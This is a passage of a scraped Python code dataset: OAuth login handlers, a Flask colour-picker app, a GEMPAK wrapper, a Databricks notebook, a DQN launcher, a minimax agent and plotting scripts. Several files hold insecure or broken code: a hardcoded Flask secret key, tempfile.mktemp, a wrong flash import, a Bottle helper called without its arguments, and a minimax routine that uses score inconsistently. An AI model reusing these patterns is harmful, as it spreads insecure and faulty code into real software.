get(self):\n        user_id = get_current_user_id()\n        if user_id:\n            logout_user(self.response)\n        self.redirect('/')\n\n\nclass AppLoginHandler(webapp2.RequestHandler):\n    def get(self):\n        params = dict()\n        params['source'] = 'app'\n        self.redirect('/login/organization?%s' % urllib.urlencode(params))\n\n\nclass PickOrganizationHandler(webapp2.RequestHandler):\n    def get(self):\n        organization_id = self.request.GET.get('organization_id', None)\n        source = self.request.GET.get('source', SOURCE_WEB)\n\n        error = None\n        if organization_id:\n            config = get_config(NAMESPACE)\n            if organization_id != config.root_organization.name:\n                try:\n                    get_organization(organization_id)\n                except OrganizationNotFoundException as e:\n                    error = e.message\n\n            if not error:\n                params = dict()\n                params['source'] = source\n                params['organization_id'] = organization_id\n                self.redirect('/login/redirect?%s' % urllib.urlencode(params))\n                return\n\n        template_dict = dict(source=self.request.GET.get('source', SOURCE_WEB),\n                             error=error)\n\n        render_page(self.response, os.path.join('unauthenticated', 'organization.html'), plugin_name=NAMESPACE,\n                    template_dict=template_dict)\n\n\nclass DoLoginHandler(webapp2.RequestHandler):\n    def get(self):\n        organization_id = self.request.GET.get('organization_id', None)\n        source = self.request.GET.get('source', SOURCE_WEB)\n\n        if not organization_id:\n            
self.redirect('/login/organization')\n            return\n\n        config = get_config(NAMESPACE)\n        if organization_id != config.root_organization.name:\n            try:\n                get_organization(organization_id)\n            except OrganizationNotFoundException as e:\n                render_error_page(self.response, httplib.BAD_REQUEST, e.message)\n                return\n\n        if source not in [SOURCE_WEB, SOURCE_APP]:\n            render_error_page(self.response, httplib.BAD_REQUEST, 'Bad Request')\n            return\n\n        if organization_id == config.root_organization.name:\n            if source == SOURCE_APP:\n                render_error_page(self.response, httplib.BAD_REQUEST, 'Bad Request')\n                return\n            else:\n                sub_org = organization_id\n        else:\n            sub_org = get_sub_organization(config, organization_id)\n\n        params = {\n            'response_type': 'code',\n            'client_id': config.root_organization.name,\n            'redirect_uri': config.root_organization[source].redirect_uri,\n            'scope': 'user:memberof:%s' % sub_org,\n            'state': str(uuid.uuid4())\n        }\n\n        login_state = OauthLoginState(key=OauthLoginState.create_key(params['state']))\n        login_state.timestamp = now()\n        login_state.organization_id = organization_id\n        login_state.source = source\n        login_state.completed = False\n        login_state.put()\n\n        oauth_url = '%s/authorize?%s' % (OAUTH_BASE_URL, urllib.urlencode(params))\n        self.redirect(oauth_url)\n\n\nclass Oauth2CallbackHandler(webapp2.RequestHandler):\n    def get(self):\n        # should only be used by source web\n        code = self.request.GET.get('code', None)\n        state = self.request.GET.get('state', None)\n        try:\n            username, scopes = get_user_scopes(code, state)\n        except HttpException as e:\n            render_error_page(self.response, e.http_code, e.error)\n            return\n\n        login_user(self.response, username, scopes)\n        self.redirect('/')\n","sub_path":"plugins/its_you_online_auth/handlers/unauthenticated.py","file_name":"unauthenticated.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"82366864","text":"import os\nfrom _curses import flash\n\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory, session\nfrom werkzeug.utils import secure_filename\nimport sqlite3 as sql\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nUPLOAD_FOLDER = os.path.join(APP_ROOT, 'userUploads/')\n\nprint('upload', UPLOAD_FOLDER)\nALLOWED_EXTENSIONS = set(['jpg', 'txt'])\n\nprint('hdere: ', UPLOAD_FOLDER)\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.secret_key = \"super secret key\"\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\n@app.route('/colorpicker')\ndef hello_world():\n    if 'name' in request.args:\n        name = request.args.get('name');\n        newPath = '/static/images/' + name;\n        session['path'] = newPath\n\n    path = session['path']\n    print('path: ', path)\n    return render_template('colorpicker.html', filename=path)\n\n@app.route('/word', methods=['GET', 'POST'])\ndef word():\n    if request.method == 'POST':\n        word = request.form['word']\n        session['word'] = word\n        return redirect('/uploadPhoto')\n    return render_template('wordselect.html')\n\n\n# @app.route('/wordPick', methods=['POST'])\n# def wordPick():\n#     word = request.form['word']\n#     return render_template('wordselect.html', word=word)\n\n@app.route('/uploadPhoto', methods=['GET', 'POST'])\ndef uploadPhoto():\n    if request.method == 'POST':\n        # check if the post request has the file part\n        if 'file' not in request.files:\n            flash('No file part')\n            return redirect(request.url)\n        file = request.files['file']\n        print('requests: ', request.files['file'])\n        # if user does not select file, browser also\n        # submit a empty part without filename\n        if file.filename == '':\n            flash('No selected file')\n            return redirect(request.url)\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            print('path: ', os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            session['photo'] = filename\n            session['path'] = '../uploads/' + filename\n            return redirect('/colorpicker')\n            # return redirect(url_for('uploadPhoto',\n            #                         filename=filename))\n\n    images = os.listdir(os.path.join(app.static_folder, \"images\"))\n\n    return render_template('pickFile.html', images=images)\n\n@app.route('/wordcolor')\ndef wordColor():\n    print(request.args)\n    print(request.query_string)\n    val1 = '#' + request.args.get('val1')\n    print(val1)\n    val2 = '#' + request.args.get('val2')\n    val3 = '#' + request.args.get('val3')\n    val4 = '#' + request.args.get('val4')\n    val5 = '#' + request.args.get('val5')\n    session['val1'] = val1;\n    session['val2'] = val2;\n    session['val3'] = val3;\n    session['val4'] = val4;\n    session['val5'] = val5;\n\n\n    colors = [val1, val2, val3, val4, val5]\n    print(colors)\n    word = session['word']\n    return render_template('wordcolor.html', colors=colors, word=word)\n\n\n@app.route('/show/')\ndef uploaded_file(filename):\n    filename = '../uploads/' + filename\n    session['path'] = filename\n    print(filename)\n    images = os.listdir(os.path.join(app.static_folder, \"images\"))\n    print(images)\n    return 
render_template('pickFile.html', filename=filename, images=images)\n\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/uploads//')\ndef send_file(filename):\n    return send_from_directory(UPLOAD_FOLDER, filename)\n\n@app.route('/final')\ndef final():\n    color = request.args.get('color')\n    word = session['word']\n    path = session['path']\n    session['color'] = color\n\n    return render_template(\"final.html\", word=word, path=path, color=color)\n\n@app.route('/list')\ndef list():\n    BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n    db_path = os.path.join(BASE_DIR, \"new_file\")\n    con = sql.connect(db_path)\n\n\n    print('connection: ', con)\n\n\n    con.row_factory = sql.Row\n\n    cur = con.cursor()\n    cur.execute(\"select * from information\")\n\n\n    rows = cur.fetchall();\n    print('rows', rows)\n\n    return render_template(\"userPhoto.html\", rows=rows)\n\n@app.route('/submit')\ndef submit():\n    word = session['word']\n    path = session['path']\n    val1 = session['val1']\n    val2 = session['val2']\n    val3 = session['val3']\n    val4 = session['val4']\n    val5 = session['val5']\n    color = session['color']\n\n\n    BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n    db_path = os.path.join(BASE_DIR, \"new_file\")\n    # con = sql.connect(db_path)\n\n    try:\n\n        with sql.connect(db_path) as con:\n            cur = con.cursor()\n            cur.execute(\"INSERT INTO information (photopath, word, hexColor, val1, val2, val3, val4, val5) VALUES(?, ?, ?, ?, ?, ?, ?, ?)\",\n                        (path, word, color, val1, val2, val3, val4, val5))\n            con.commit()\n            msg = \"Record successfully added\"\n            print(msg)\n    except:\n        con.rollback()\n        msg = \"error in insert operation\"\n        print(msg)\n\n    finally:\n        return redirect('/list')\n        con.close()\n\n\nif __name__ == '__main__':\n    app.run()\n","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"267304827","text":"\"\"\"\n Run gpnids and send the result back to stdout\n\"\"\"\n\nimport sys\nimport os\nimport tempfile\nimport subprocess\n\n\nos.putenv(\"GEMTBL\", \"/home/ldm/pyWWA/gempak/tables\")\nos.putenv(\"GEMERR\", \"/home/ldm/pyWWA/gempak/error\")\nos.putenv(\"GEMPDF\", \"/home/ldm/pyWWA/gempak/pdf\")\n\ndef write_data():\n    \"\"\"\n    Do the GEMPAK workflow!\n    \"\"\"\n    tmpfn = tempfile.mktemp().lower()\n    o = open(\"%s.ncr\" % (tmpfn,), 'wb')\n    o.write( sys.stdin.read() )\n    o.close()\n    return tmpfn\n\ndef do_gempak(tmpfn):\n    \"\"\"\n    Do the GEMPAK workflow\n    \"\"\"\n    cmd = \"\"\"  RADFIL   = %s.ncr\n RADTIM   =\n TITLE    = 1\n PANEL    = 0\n DEVICE   = GIF|%s.gif\n CLEAR    = YES\n TEXT     = 1\n COLORS   = 1\n WIND     = \n LINE     = 3\n CLRBAR   =\n IMCBAR   =\n GAREA    = DSET\n MAP      = 1/1/2\n LATLON   =\n OUTPUT   = f/%s.out\n list\n run\n\n exit\n\"\"\" % (tmpfn, tmpfn, tmpfn)\n    p = subprocess.Popen(\"/home/ldm/bin/gpnids_vg\",\n                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n                         stderr=subprocess.PIPE)\n    p.communicate(cmd)\n    #(so, se) = p.communicate(cmd)\n    #p.stdin.write(cmd)\n    #se = p.stderr.read()\n    #so = p.stdout.read()\n    #time.sleep(3)\n    #l.write( se )\n    #l.write(so)\n    for suffix in ['gif','ncr']:\n        if os.path.isfile('%s.%s' % (tmpfn,suffix)):\n            os.unlink(\"%s.%s\" % (tmpfn,suffix))\n\ndef main():\n    \"\"\"\n    Actually do work!\n    \"\"\"\n    tmpfn = write_data()\n    do_gempak(tmpfn)\n    fn = \"%s.out\" % (tmpfn,)\n    if os.path.isfile(fn):\n        sys.stdout.write( open(fn).read() )\n        os.unlink(fn)\n    \nif __name__ == '__main__':\n    main()\n\n\n","sub_path":"ncr2postgis.py","file_name":"ncr2postgis.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"71166079","text":"# Databricks notebook source\n# Mount Azure storage\nMOUNTPOINT = \"/mnt/weatherstorage\"\nCONTAINER = dbutils.secrets.get(scope=\"Azure Key Vault\", key=\"container-name\")\nSTORAGE = dbutils.secrets.get(scope=\"Azure Key Vault\", key=\"storage-account-name\")\nSAS = dbutils.secrets.get(scope=\"Azure Key Vault\", key=\"databricks-accesstoken\")\nURI = \"fs.azure.sas.{container}.{storage}.blob.core.windows.net\".format(container=CONTAINER, storage=STORAGE)\n\ntry:\n  dbutils.fs.mount(\n    source = \"wasbs://{container}@{storage}.blob.core.windows.net\".format(container=CONTAINER, storage=STORAGE), \n    mount_point = MOUNTPOINT,\n    extra_configs = {URI:SAS})\nexcept Exception as e:\n  if \"Directory already mounted\" in str(e):\n    print(\"Mount already exists\")\n    pass\n  else:\n    raise e\n\n# COMMAND ----------\n\n# Load electric yearly coonsumption from an Excel file retrieved manually from the electric company\nfrom pyspark.sql.functions import *\n\nelDf = (spark.read.format(\"com.crealytics.spark.excel\")\n.option(\"header\", \"true\")\n.option(\"treatEmptyValuesAsNulls\", \"false\")\n.option(\"inferSchema\", \"true\")\n.option(\"addColorColumns\", \"false\")\n.load(\"/mnt/weatherstorage/electric-usage.xlsx\"))\nelDf = elDf.where(\"Tila <> 'Puuttuva'\").withColumn(\"DateHour\", date_format(to_timestamp(concat(col(\"Päivämäärä\"), lit(\" \"), col(\"Tunti\")), \"d.M.yyyy H:mm\"), \"yyyy-MM-dd HH\"))\ndisplay(elDf)\n\n# COMMAND ----------\n\n# Load the temperature data and group it by each hour calculating the average\ntemperDf = spark.read.format(\"json\").load(\"/mnt/weatherstorage/weatherdata.json\")\ntemperDf = temperDf.withColumn(\"DateHour\", date_format(to_timestamp(col(\"datetime\")), \"yyyy-MM-dd HH\")).groupBy(\"DateHour\").agg(avg(\"temperature\").alias(\"Temperature\"))\ndisplay(temperDf)\n\n# COMMAND ----------\n\n# Join the earlier fetched temperature data to the electric usage data\nfrom pyspark.sql import *\n# Ugly way of joining:\n#    combDf = temperDf.join(elDf, temperDf[\"DateHour\"] == elDf[\"DateHour\"]).select(temperDf[\"DateHour\"], \"Temperature\", \"kWh\")\n# SQL way:\ntemperDf.registerTempTable(\"temper\")\nelDf.registerTempTable(\"elusage\")\ncombDf = sqlContext.sql(\"\"\"SELECT elusage.DateHour, temper.Temperature, elusage.kWh FROM temper RIGHT OUTER JOIN elusage ON temper.DateHour == elusage.DateHour\"\"\")\n\ndisplay(combDf)","sub_path":"DataBricks/electricdata.py","file_name":"electricdata.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"2363275","text":"n,m = map(int,input().split())\n\nboard = [[10001]*n for _ in range(n)]\n\nfor _ in range(m):\n    a,b = map(int,input().split())\n    board[a-1][b-1] = 1\n    board[b-1][a-1] = 1\n\nfor i in range(n):\n    board[i][i] = 0\nminny = 10001\nfor k in range(n):\n    for x in range(n):\n        for y in range(n):\n            if board[x][k] <10000 and board[k][y] < 10000:\n                board[x][y] = min(board[x][y], board[x][k]+board[k][y])\n\nanswer = 0\nfor i,b in enumerate(board):\n    if minny > sum(b):\n        answer = i+1\n        minny = sum(b)\nprint(answer)\n","sub_path":"1389 케빈 베이컨의 6단계 법칙.py","file_name":"1389 케빈 베이컨의 6단계 법칙.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"571307216","text":"#\n# Call it this way :\n# python launcher.py --name Angela --mode train --episodes 100 --epsilon 0.95 --epsilon_decay 0.98 --batch_size 8\n# python launcher.py --name Angela --mode test --load Angela___445.00max__181.50avg___65.00min__1613079598.model\n\n# Train a previous model\n# python launcher.py --name Angela --mode train --load Angela___380.00max__178.50avg___40.00min__1613082541.model --episodes 100 --epsilon 0.95 --epsilon_decay 0.98 --batch_size 8\n\n# tensorboard --logs_dir=D:\\AI\\AI_Framework\\tradingBot_DQN_v1\\logs\n#\nimport sys,os\nimport argparse\nimport time\nimport numpy as np \n\nimport gym\n\n# our code\nfrom DQNAgent import DQNAgent\nfrom Magician import Magician\n\n#\n# Command line arguments\n#\nparser = argparse.ArgumentParser(description=\"Train and test different networks on Space Invaders\")\n\n# Parse arguments\n# parser.add_argument(\"-n\", \"--network\", type=str, action='store', help=\"Please specify the network you wish to use, either DQN or DDQN\", required=True)\nparser.add_argument(\"-n\", \"--name\", type=str, action='store', help=\"Please specify the name of your AI model (bob, louis, estelle...)\", required=True)\nparser.add_argument(\"-m\", \"--mode\", type=str, action='store', help=\"Please specify the mode you wish to run, either train or test\", required=True)\nparser.add_argument(\"-l\", \"--load\", type=str, action='store', help=\"Please specify the file you wish to load weights from(for example saved.h5)\", required=False)\nparser.add_argument(\"-e\", \"--episodes\", type=str, action='store', help=\"Number of episodes to run\", required=False)\nparser.add_argument(\"-epsilon\", \"--epsilon\", type=str, action='store', help=\"Epsilon (from 0.0 to 1.0)\", required=False)\nparser.add_argument(\"-ed\", \"--epsilon_decay\", type=str, action='store', help=\"Epsilon Decay (from 0.0 to 1.0)\", required=False)\nparser.add_argument(\"-b\", \"--batch_size\", type=str, action='store', help=\"Number of steps to train the model at each step of the game\", required=False)\n# parser.add_argument(\"-s\", \"--save\", type=str, action='store', help=\"Specify folder to render simulation of network in\", required=False)\n# parser.add_argument(\"-x\", \"--statistics\", action='store_true', help=\"Specify to calculate statistics of network(such as average score on game)\", required=False)\n# parser.add_argument(\"-v\", \"--view\", action='store_true', help=\"Display the network playing a game of space-invaders. 
Is overriden by the -s command\", required=False)\nargs = parser.parse_args()\nprint(args)\n\n#\n# Create the environment (Game, Trading, whatever...)\n#\n\nenvironment = gym.make('SpaceInvaders-v0')\n#environment = gym.make(\"MountainCar-v0\")\n\n#\n# Create or load a trainer\n#\n#if args.load:\n    # load here a new trainer model\n#else:\n\n# Give the trainer the size of the environment and the number of possible actions\n\n#\n# observation_space : API\n#\n# observation_space.low / observation_space.high / observation_space.shape\n# observation_space.sample() / observation_space.contains()\n\nobs_space_high = environment.observation_space.high\nobs_space_low = environment.observation_space.low\n\n#print(\" observation_space : \" + str(environment.observation_space))\n#print(\" High : \" + str(environment.observation_space.high))\n#print(\" Low : \" + str(environment.observation_space.low))\n#print(\" Shape : \" + str(environment.observation_space.shape))\n\n#\n# Create the Agent\n#\nmyDQNAgent = DQNAgent(name=args.name)\n\n    \n\n\n#\n# Test the choosen model\n#\nif args.mode == \"test\":\n\n    myDQNAgent = DQNAgent(name=args.name)\n\n    magician = Magician(agent=myDQNAgent, env=environment)\n\n    magician.test(model_to_load=args.load)\n\n#\n# Train the choosen model\n#\nif args.mode == \"train\":\n\n    myDQNAgent.set_parameters(environment.observation_space.shape, environment.env.action_space.n, batch_size=int(args.batch_size), learning_rate=0.001,)\n\n    if not args.load:\n        myDQNAgent.prepare_new_model();\n    else:\n        myDQNAgent.load_model(args.load)\n        \n    #\n    # Create the Magician who deals with the Trainer and the Environment\n    #\n    magician = Magician(agent=myDQNAgent, env=environment, epsilon=float(args.epsilon), epsilon_decay=float(args.epsilon_decay), epsilon_mini=0.001)\n\n    # train the agent\n    magician.doMagic(nb_episodes=int(args.episodes))\n\n\n\n","sub_path":"tradingBot_DQN_v1/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"351504002","text":"'''\nhttps://matplotlib.org/3.1.0/tutorials/colors/colormaps.html.\n'''\n\nimport datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndataset = pd.read_csv('https://storage.googleapis.com/dqlab-dataset/retail_raw_reduced.csv')\ndataset['order_month'] = dataset['order_date'].apply(lambda x: datetime.datetime.strptime(x, \"%Y-%m-%d\").strftime('%Y-%m'))\ndataset['gmv'] = dataset['item_price']*dataset['quantity']\n\nplt.clf()\ndataset.groupby(['order_month', 'province'])['gmv'].sum().unstack().plot(cmap='Set1')\nplt.title('Monthly GMV Year 2019 - Breakdown by Province', loc='center', pad=30, fontsize=20, color='blue')\nplt.xlabel('Order Month', fontsize = 15)\nplt.ylabel('Total Amount (in Billions)', fontsize = 15)\nplt.grid(color='darkgray', linestyle=':', linewidth=0.5)\nplt.ylim(ymin=0)\nlabels, locations = plt.yticks()\nplt.yticks(labels, (labels/1000000000).astype(int))\nplt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.5), shadow=True, ncol=3, title='Province', fontsize=9, title_fontsize=11)\nplt.gcf().set_size_inches(10, 5)\nplt.tight_layout()\nplt.show()","sub_path":"05 Data Visualization with Python Matplotlib for Beginner/Part 2/09 kustomisasi colormap.py","file_name":"09 kustomisasi colormap.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"597407495","text":"from math import inf\r\nimport copy\r\n\r\nclass MinimaxAlphaBetaAgent():\r\n\r\n\tdef __init__(self):\r\n\t\treturn\r\n\t\r\n\tdef staticEval(self, state):\r\n\t\treturn state.score\r\n\r\n\tdef minimax_alpha_beta(self, state, depth, alpha, beta, isMax):\r\n\t\tif state.gameOver() or depth is 0:\r\n\t\t\treturn -1, state.score() - depth\r\n\t\tif isMax:\r\n\t\t\tbestValue = -1, -inf\r\n\t\telse:\r\n\t\t\tbestValue = -1, inf\r\n\r\n\t\tfor s in self.get_all_next_moves(state):\r\n\t\t\tplayer = 'X' if isMax else 'O'\r\n\t\t\tstate.move(player, s)\r\n\t\t\tvalue = s, self.minimax_alpha_beta(state, depth - 1, alpha, beta, not isMax)[1]\r\n\t\t\tstate.undo_move(player, s)\r\n\t\t\tif isMax:\r\n\t\t\t\tbestValue = max(bestValue, value, key= lambda i: i[1])\r\n\t\t\t\talpha = max(alpha, bestValue[1])\r\n\t\t\t\tif alpha >= beta:\r\n\t\t\t\t\tbreak\r\n\t\t\t\t\t#return s, alpha\r\n\t\t\telse:\r\n\t\t\t\tbestValue = min(bestValue, value, key= lambda i: i[1])\r\n\t\t\t\tbeta = min(beta, value[1])\r\n\t\t\t\tif alpha >= beta:\r\n\t\t\t\t\tbreak\r\n\t\t\t\t\t#return s, beta\r\n\t\treturn bestValue\r\n\r\n\tdef choose(self, state, player):\r\n\t\treturn self.minimax_alpha_beta(state, len(self.get_all_next_moves(state)), -inf, inf, player)\r\n\r\n\tdef get_all_next_moves(self, state):\r\n\t\tmoves = []\r\n\t\tfor row in state.empty_tiles():\r\n\t\t\tfor tile in row:\r\n\t\t\t\tmoves.append(tile)\r\n\t\treturn moves\r\n","sub_path":"Resources/code/minimaxAlphaBetaAgent.py","file_name":"minimaxAlphaBetaAgent.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"378868178","text":"\n#####################################################################\n### Assignment skeleton\n### You can alter the below code to make your own dynamic website.\n### The landing page for assignment 3 should be at /\n#####################################################################\n\nfrom bottle import route, run, default_app, debug\n\ndef htmlify(title,text):\n    page = \"\"\"\n        \n        \n            \n                \n                %s\n            \n            \n            %s\n            \n        \n\n    \"\"\" % (title,text)\n    return page\n\ndef index():\n    return htmlify()\n    \ndef kobe():\n\treturn htmlify()\n\n\nroute('/index.html', 'GET', index)\nroute('/Kobe_Bryant.html', 'GET', kobe)\n\n#####################################################################\n### Don't alter the below code.\n### It allows this website to be hosted on Heroku\n### OR run on your computer.\n#####################################################################\n\n# This line makes bottle give nicer error messages\ndebug(True)\n# This line is necessary for running on Heroku\napp = default_app()\n# The below code is necessary for running this bottle app standalone on your computer.\nif __name__ == \"__main__\":\n  run()\n\n","sub_path":"Web_app2/bottle_app.py","file_name":"bottle_app.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"32146625","text":"#!/usr/bin/python\n\"\"\"Create a blushlist file from the given input files and categories.\"\"\"\n# Usage: make_blushlist.py  \n\nimport sys, hashlib\ndef main():\n  \"\"\"Read all input files and output the blushlist file.\"\"\"\n  if len(sys.argv) < 4:\n    sys.exit(\"Usage: make_blushlist.py  { \"\n             \"}\")\n\n  f_out = open(sys.argv[1], \"w\")\n  f_out.write(\"// This file is automatically generated by make_blushlist.py\\n\")\n  f_out.write(\"let blushlist = {\\n\")\n  i = 2\n\n  hasher = hashlib.new('sha256')\n  version_hasher = hashlib.new('sha256')\n  # Process all of the files, one by one\n  while i < len(sys.argv):\n    try:\n      f_in = open(sys.argv[i], \"r\")\n    except IOError as ex:\n      sys.exit(\"Can't find file: %s\" % ex)\n    category = sys.argv[i + 1]\n    version_hasher.update(category)\n    for line in f_in.readlines():\n      line = line.strip().lower()\n      hasher.update(line)\n      f_out.write(\"  \\\"%s\\\" : \\\"%s\\\",\\n\" % (hasher.hexdigest()[:48], category))\n      hasher = hashlib.new('sha256')\n      version_hasher.update(line)\n    f_in.close()\n    i += 2\n\n  f_out.write(\"};\\n\")\n  f_out.write(\"module.exports.map = blushlist;\\n\")\n  f_out.write(\"module.exports.version = \\\"%s\\\";\\n\" % version_hasher.hexdigest())\n\n  f_out.close()\n\nif __name__ == \"__main__\":\n  main()\n","sub_path":"util/make_blushlist.py","file_name":"make_blushlist.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"440940963","text":"# coding=utf-8\n\nimport logging\nimport time\nfrom collections import namedtuple\n\nfrom frontik.request_context import RequestContext\n\nlogger = None  # for smooth transition from LoggerAdapter instances to the global logger\n\n_logger = logging.getLogger('frontik.handler')\n\n\nclass RequestLogger(logging.LoggerAdapter):\n\n    Stage = namedtuple('Stage', ('name', 'delta', 'start_delta'))\n\n    def __init__(self, request):\n        self._page_handler_name = None\n        self._last_stage_time = self._start_time = request._start_time\n        self.stages = []\n\n        super(RequestLogger, self).__init__(_logger, {})\n\n        # backcompatibility with logger\n        self.warn = self.warning\n\n    def stage_tag(self, stage_name):\n        stage_end_time = time.time()\n        stage_start_time = self._last_stage_time\n        self._last_stage_time = stage_end_time\n\n        delta = (stage_end_time - stage_start_time) * 1000\n        start_delta = (stage_start_time - self._start_time) * 1000\n        stage = RequestLogger.Stage(stage_name, delta, start_delta)\n\n        self.stages.append(stage)\n        self.debug('stage \"%s\" completed in %.2fms', stage.name, stage.delta, extra={'_stage': stage})\n\n    def get_current_total(self):\n        return sum(s.delta for s in self.stages)\n\n    def log_stages(self, status_code):\n        \"\"\"Writes available stages, total value and status code\"\"\"\n\n        stages_str = ' '.join('{s.name}={s.delta:.2f}'.format(s=s) for s in self.stages)\n        total = sum(s.delta for s in self.stages)\n\n        self.info(\n            'timings for %(page)s : %(stages)s',\n            {\n                'page': RequestContext.get('handler_name'),\n                'stages': '{0} total={1:.2f} code={2}'.format(stages_str, total, status_code)\n            },\n        )\n\n    def process(self, msg, kwargs):\n        if 'extra' in kwargs:\n            kwargs['extra'].update(self.extra)\n        else:\n            kwargs['extra'] = self.extra\n\n        return msg, kwargs\n","sub_path":"frontik/loggers/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"339351395","text":"from __future__ import division\nimport  matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n#import sys\nfrom os.path import expanduser\n\n\ndef xfrm(X, _max): return _max-np.array(X)\n\ndef figplot(dat, y, x, seed, xlab, ylab, fig, fit, disp, n):\n\n    fs = 8\n    if disp == 0: \n        sz = 0.1\n    else:\n        sz = 0.1\n    a = 1\n\n    e = max(seed)\n    dat = dat.tolist()\n    y = y.tolist()\n    \n    x = x.tolist()\n    seed = seed.tolist()\n\n    fig.add_subplot(2, 2, n)\n\n    clrs = []\n\n    for i, val in enumerate(dat):\n        sd = seed[i]    \n        clr = str()\n        if sd <= e*0.3: clr = 'red'\n        elif sd < e*0.4: clr = 'orange'\n        elif sd < e*0.5: clr = 'yellow'\n        elif sd < e*0.6: clr = 'lawngreen'\n        elif sd < e*0.7: clr = 'green'\n        elif sd < e*0.8: clr = 'deepskyblue'\n        elif sd < e*0.9: clr = 'blue'\n        else: clr = 'purple'\n        clrs.append(clr)\n\n    plt.scatter(x, y, s = sz, c=clrs, linewidths=0.0, alpha=a, edgecolor=None)\n    plt.xlabel(xlab, fontsize=fs+2)\n    plt.ylabel(ylab, fontsize=fs+2)\n    plt.tick_params(axis='both', labelsize=fs)\n    return fig\n\n\n\ndef figfunction(met1, met2, fname, disp, label):\n\n    ws, hs = 0.4, 0.4\n    mydir = expanduser(\"~/GitHub/DormancyDecay\")\n\n    fit = 1\n    df = pd.read_csv(mydir+'/model/ModelData/modelresults-numfit.txt')    \n    df = df[df['disperse'] == disp]\n    \n    df = df[df['fit'] == 1]\n    \n    fig = plt.figure()\n\n    if met2 == 'p_err': ylab = 'Percent error'\n    elif met2 == 'p_dif': ylab = 'Percent difference'\n    elif met2 == 'a_dif': ylab = 'Difference'\n\n    xlab = 'Environmental filtering'\n    \n    \n    if label == 'avg':\n        y = df[met1 + '_' + 'e_actslope' + '-' + met2]\n        labels2 = ['e_allslope','g_actslope','g_allslope']\n        for l in labels2:\n            y += df[met1 + '_' + l + '-' + met2]\n        y = y/4\n    else:\n        y = df[met1 + '_' + label + '-' + met2]\n        \n        \n    fig = figplot(df['fit'], y, df['env_r'], df['env_r'], xlab, ylab, fig, fit, disp, 1)\n\n    xlab = 'Dormant death'\n    fig = figplot(df['fit'], y, df['dded'], df['env_r'], xlab, ylab, fig, fit, disp, 2)\n\n    if disp == 1:\n        xlab = 'Active dispersal'\n        fig = figplot(df['fit'], y, df['ad_s'], df['env_r'], xlab, ylab, fig, fit, disp, 3)\n\n        xlab = 'Dormant dispersal'\n        fig = figplot(df['fit'], y, df['dd_s'], df['env_r'], xlab, ylab, fig, fit, disp, 4)\n        \n        \n    #### Final Format and Save #####################################################\n    plt.subplots_adjust(wspace=ws, hspace=hs)\n    \n    plt.savefig(mydir+'/figs/FromSims/temp/'+label+'/'+met1+'-'+met2+fname+'.png',\n        dpi=400, bbox_inches = \"tight\")\n    plt.close()\n\n\n    \n\nfor i in range(2):\n    mydir = expanduser(\"~/GitHub/DormancyDecay\")\n    df = pd.read_csv(mydir+'/model/ModelData/modelresults-numfit.txt')\n    df = df[df['disperse'] == i]\n    \n    tot = df.shape[0]\n    df = df[df['fit'] == 1]\n    fits = df.shape[0]\n    \n    if i == 0:\n        print('No dispersal:', 100*fits/tot)\n    elif i == 1:\n        print('Dispersal:', 100*fits/tot)\n        \n    print('AvgAct:', np.mean(df['avgAct']), 'AvgAll', np.mean(df['avgAll']))\n    print('Sact:', np.mean(df['Sact']), 'Sall:', np.mean(df['Sall']),'\\n')\n\n\n    \n\nfnames = ['_no-dispersal', '_dispersal']\ndisperse = [0, 1]\n\nmetrics1 = ['bray', 'sore', 'canb']\nmetrics2 = ['p_err']\n\nlabels = 
['e_actslope','e_allslope','g_actslope','g_allslope','avg']\n#labels = ['avg']\nfor label in labels:\n    for i, fname in enumerate(fnames):\n        for met1 in metrics1:\n            for met2 in metrics2:\n        \n                disp = i\n                figfunction(met1, met2, fname, disp, label)\n","sub_path":"model/ModelComparisonScripts/ScatterFigs.py","file_name":"ScatterFigs.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
